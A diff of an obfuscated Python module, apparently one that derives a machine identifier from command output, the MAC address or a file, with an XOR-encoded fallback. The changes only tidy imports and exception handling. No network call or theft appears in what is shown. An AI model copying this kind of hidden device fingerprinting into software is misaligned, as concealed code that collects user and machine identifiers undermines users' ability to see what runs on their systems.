@@ -13,14 +13,12 @@
 # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 # See the License for the specific language governing permissions and
 # limitations under the License
-from builtins import bytes, chr
 
 if 64 - 64:
     i11iIiiIii
 import base64
 import os
 import subprocess
-from builtins import range, str
 from getpass import getuser
 from sys import platform
 from uuid import getnode
@@ -87,7 +85,7 @@ def i1ii1iIII():
             o0o0Oo0oooo0 = subprocess.check_output(i1iIIII)[:-1]
             if o0o0Oo0oooo0:
                 return o0o0Oo0oooo0
-        except:
+        except Exception:
             pass
         try:
             o0o0Oo0oooo0 = str(
@@ -101,13 +99,13 @@ def i1ii1iIII():
             ).split('"')[-2]
             if o0o0Oo0oooo0:
                 return o0o0Oo0oooo0
-        except:
+        except Exception:
             pass
         try:
             o0o0Oo0oooo0 = hex(getnode())
             if o0o0Oo0oooo0:
                 return o0o0Oo0oooo0
-        except:
+        except Exception:
             pass
     return _4_(";:>;=TT9\x1e\x00:>;r=:TWrW\x01>;r=::W\x01o\x03Toohj")
     if 26 - 26:
@@ -120,9 +118,7 @@ ldsad__343 = len(dsad__343)
 
 
 def _4_(___adeje__1l1_):
-    return "".join(
-        [chr(ord(c) ^ ndsad__343[i % ldsad__343]) for i, c in enumerate(___adeje__1l1_)]
-    )
+    return "".join([chr(ord(c) ^ ndsad__343[i % ldsad__343]) for i, c in enumerate(___adeje__1l1_)])
 
 
 def oO0O0o0o0(__fjeja_1l1__):
@@ -131,7 +127,7 @@ def oO0O0o0o0(__fjeja_1l1__):
             try:
                 with open(__fjeja_1l1__) as o0o0Oo0oooo0:
                     return o0o0Oo0oooo0.read().strip()
-            except:
+            except Exception:
                 pass
     return None
     if 34 - 34:
